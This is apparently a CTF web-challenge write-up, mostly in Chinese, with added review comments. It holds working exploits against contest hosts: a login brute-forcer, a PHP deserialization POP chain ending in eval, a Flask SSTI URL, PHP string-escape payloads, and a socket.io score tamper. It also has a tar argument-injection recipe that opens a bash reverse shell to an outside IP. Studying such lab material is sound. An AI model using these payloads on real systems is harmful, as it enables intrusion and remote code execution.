web

babyupload


.htaccess


执行env即可

ez!http


find-the-id


tflock

import requests
url = "http://27.25.151.80:36338/login.php"

# Accounts noted by the author for this challenge:
# ctfer:123456
# admin:x
# NOTE(review): the pasted listing lost its indentation; the nesting below is a
# reconstruction. In particular, whether the second request (the ctfer login and
# the i > 510 stop) sits inside the `for` loop or after it cannot be told from
# the page — confirm against the original script.
a = True
with open("./passs.txt", encoding="utf-8") as fp:
    user_list = ["admin", "ctfer"]
    while a == True:
        i = 0
        # fp is consumed by this loop, so a second pass of the while loop would
        # read nothing from it
        for line in fp:
            # strip the trailing newline (this also removes the last character
            # of a final line that has no newline)
            line = line[:-1:]

            # print(i)
            data = {
                "username": user_list[0],
                "password": line
            }
            res = requests.post(url= url, data= data)
            # print(res.text)
            # `a` now holds the response body (a str); `a == True` is False for
            # a str, so the while loop does not repeat once the for loop ends
            a = res.text
            print(data)
            # the failure response is assumed to contain "false"; any other
            # body is treated as a hit
            if "false" not in res.text:
                print("找到啦")
                print(res.text)
                print(data)
                a = False
                break
            i += 1



            # A fixed login as the second account; its purpose is not stated on
            # the page. The password is the int 123456 rather than a str —
            # presumably form-encoded the same way, but worth checking.
            # Server side, a rate limit keyed on the client (not only a
            # per-account lockout) is what throttles a loop like this.
            data = {
                "username": user_list[1],
                "password": 123456
            }
            res = requests.post(url=url, data=data)
            # print(res.text)
            # print(data)
            # i is incremented once per request, so the run stops after about
            # 510 requests in total
            i += 1
            if i>510:
                a = False
                break

我写的网站被rce了?

进程等功能都给写死了,只有日志有可能,ua日志注入无文件包含不可行,考虑直接命令执行


RedFlag

current_app直接有了


http://27.25.151.80:36746/redflag/%7B%7Burl_for.__globals__['current_app'].config

LovePopChain


<?php
class MyObject{
    // The numbered comments (//1 .. //4) are the author's annotation of the
    // order in which the chain's objects are nested; kept as written.
    public $NoLove="Do_You_Want_Fl4g?"; //4 hybcx
    public $Forgzy; //2 GaoZhouYue
    /**
     * Runs on unserialize(). The loose comparison (==) against a string means
     * that if $NoLove holds an object with a __toString() method, that method
     * is called to perform the comparison — this is the chain's entry point.
     */
    public function __wakeup()
    {
        if($this->NoLove == "Do_You_Want_Fl4g?"){
            echo 'Love but not getting it!!';
        }
    }
    /**
     * Runs when an instance is called like a function ($obj()). Cloning a
     * fresh GaoZhouYue fires GaoZhouYue::__clone().
     */
    public function __invoke()
    {
        $this->Forgzy = clone new GaoZhouYue();
    }
}

class GaoZhouYue{
    public $Yuer;
    public $LastOne;
    /**
     * Runs when an instance is cloned (see MyObject::__invoke). The eval() on a
     * raw POST field is the code-execution sink of this challenge; the page's
     * chain ends here. Presumably the target unserializes user-controlled
     * data — that call is not shown on the page.
     */
    public function __clone()
    {
        echo '最后一次了, 爱而不得, 未必就是遗憾~~';
        eval($_POST['y3y4']); //1 shell
    }
}

class hybcx{
    public $JiuYue;
    public $Si; //3 Myobject

    // Called for any undefined method on this object; stores the first
    // argument in $this->Si->JiuYue. Appears unused by the chain the script
    // below builds.
    public function __call($fun1,$arg){
        $this->Si->JiuYue=$arg[0];
    }

    // Called when the object is used as a string (here: the == comparison in
    // MyObject::__wakeup). Invokes $Si as a function, which dispatches to
    // $Si's __invoke() when $Si is an object that defines one.
    public function __toString(){
        $ai = $this->Si;
        echo 'I W1ll remember you';
        return $ai();
    }
}

// Wire the chain: unserialize(MyObject) -> __wakeup() compares $NoLove (a hybcx)
// with a string -> hybcx::__toString() -> $Si() -> MyObject::__invoke() ->
// clone new GaoZhouYue() -> GaoZhouYue::__clone() -> eval(). The defect is the
// combination of unserialize() on untrusted input and a reachable eval(), not
// any single magic method.
$myObject = new MyObject();
$hybcx = new hybcx();
$GaoZhouYue = new GaoZhouYue();
// __invoke() reassigns $Forgzy with a fresh clone, so this assignment looks
// redundant for the chain; kept as the author wrote it.
$myObject->Forgzy=$GaoZhouYue;
$hybcx->Si=$myObject;
$myObject->NoLove=$hybcx;
echo serialize($myObject);

ez_md5

ffifdyop进入

不知道为毛必须得去掉headers中的某些东西….

import requests

url = "http://27.25.151.80:41564/LnPkcKqy_levl2.php?a[]=1&b[]=2"
# The form field name contains '[' and '.'; the author relies on how the PHP
# backend rewrites such names — not shown on the page, confirm there.
data = {
    'Build[CTF.com': '1145146803531'
}
# Headers the author tried and then disabled; the note above the listing says
# some of them had to be removed for the request to succeed.
# NOTE(review): the original paste included live session cookies (GZCTF_Token,
# uuid, td_cookie); they are redacted here — session tokens should never be
# published, even in a commented-out block.
# headers = {
# 'Content-Length': '37',
# 'Cache-Control': 'max-age=0',
# 'Origin': 'http://27.25.151.80:41564',
# 'Content-Type': 'application/x-www-form-urlencoded',
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
# 'Accept-Encoding': 'gzip, deflate, br',
# 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
# 'Cookie': '<REDACTED: session cookies removed from the pasted request>',
# 'Connection': 'close'
# }

response = requests.post(url, data=data)

print(response.text)

eazyl0gin

var express = require('express');
var router = express.Router();
const crypto = require('crypto');
const { type } = require('os');

/* GET users listing: fixed placeholder body. */
router.get('/', (req, res) => {
  res.send('respond with a resource');
});

router.post('/login',function(req,res,next){
  // Coerce both fields to strings so the later .toLowerCase()/.update()
  // calls do not throw on arrays, objects or undefined.
  var data = {
    username: String(req.body.username),
    password: String(req.body.password)
  }
  const md5 = crypto.createHash('md5');
  const flag = process.env.flag

  // The first gate tests the lower-cased name and the second the upper-cased
  // name. These are two different case mappings: JavaScript case conversion
  // follows Unicode, and some characters upper-case to an ASCII letter without
  // lower-casing to the matching ASCII letter, so a username can fail the
  // first check and still pass the second. To make the gates consistent,
  // normalize once (e.g. NFKC plus a single case fold) and compare that one
  // value in both checks, or reject non-ASCII usernames up front.
  if(data.username.toLowerCase()==='buildctf'){
    return res.render('login',{data:"你不许用buildctf账户登陆"})
  }

  if(data.username.toUpperCase()!='BUILDCTF'){
    return res.render('login',{data:"只有buildctf这一个账户哦~"})
  }

  // Unsalted MD5 of the password compared with != against a hard-coded digest.
  // Outside a CTF this would be a slow password hash (scrypt/argon2) checked
  // with crypto.timingSafeEqual and a strict comparison.
  var md5pwd = md5.update(data.password).digest('hex')
  if(md5pwd.toLowerCase()!='b26230fafbc4b147ac48217291727c98'){
    return res.render('login',{data:"密码错误"})
  }
  // On success the flag from the environment is rendered into the page.
  return res.render('login',{data:flag})

})
module.exports = router;

[技巧收藏]javascript大小写转换的特性 - K1ra8 - 博客园



sub


替换jwt



拼接命令造成命令执行


打包给你

tar参数注入

掌控安全CTF - 8月(WEB&AWD方向)_showdoc漏洞 ctf-CSDN博客



# Defender note: file names that begin with "--" are read by tar as options
# when a shell glob expands them on its command line. Terminating the option
# list with "--" before the glob, or passing names via --files-from, prevents
# this, as does restricting what names an upload may carry.
echo 'bash -c "bash -i >& /dev/tcp/1.1.1.1/10086 0>&1"' | base64
echo "" > "--checkpoint-action=exec=echo [base64_reverseshell_payload] | base64 -d | bash" # creates the first file
echo "" > --checkpoint=1 # creates the second file
echo "" > test.txt # creates the third file


只能socket连接

const io = require('socket.io-client');

const clients = [];

// Number of 'click' events each client emits right after connecting.
const numberOfClicks = 10;

const serverUrl = 'ws://27.25.151.80:41924/';

// The loop bound is 1, so a single client is created; `clients` only keeps it
// referenced. Looks like a leftover from a multi-client version — a guess.
for (let i = 0; i < 1; i++) {
  const client = io.connect(serverUrl);
  clients.push(client);

  client.on('connect', () => {
    console.log(`Client ${client.id} connected`);

    for (let j = 0; j < numberOfClicks; j++) {
      // The payload carries a client-chosen `power`. How the server uses it
      // is not shown on the page; from the defender side, score increments
      // must be computed server-side rather than taken from the client.
      const clickEvent = {
        value: 0,
        power: 1000000000000000000000
      };

      client.emit('click', JSON.stringify(clickEvent));
    }
  });

  // Event name is spelled 'recievedScore'; presumably it matches the server's
  // emit — not verifiable here.
  client.on('recievedScore', (data) => {
    const score = JSON.parse(data);
    console.log(`Client ${client.id} received
score:${score.value}`);
  });

  client.on('error', (data) => {
    console.error(`Client ${client.id} received error:${data}`);
  });
}


Why_so_serials?

字符串逃逸

<?php


class Gotham{
    // Default values; they produce the serialized sample shown below the script.
    public $Bruce = '123';
    public $Wayne = 'joker';
    public $crime=true;
    // The constructor is commented out, so instances keep the defaults above.
    // public function __construct($Bruce,$Wayne){
    //     $this->Bruce = $Bruce;
    //     $this->Wayne = $Wayne;
    // }
}

// Print the serialized form of a default Gotham instance.
$gotham = new Gotham();
print serialize($gotham);

O:6:"Gotham":3:{s:5:"Bruce";s:3:"123";s:5:"Wayne";s:5:"joker";s:5:"crime";b:1;}

$s = 'jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker";s:5:"crime";b:1;}'

'phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}'

http://27.25.151.80:41971?Bruce=123&Wayne=jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker";s:5:"crime";b:1;}

刮刮乐

http://27.25.151.80:41999/?cmd=cat /fl* | tee 1.txt


ez_waf

溢出使waf失效


fake_signin

受泰山杯文件上传的条件竞争启发

同时发包完成签到
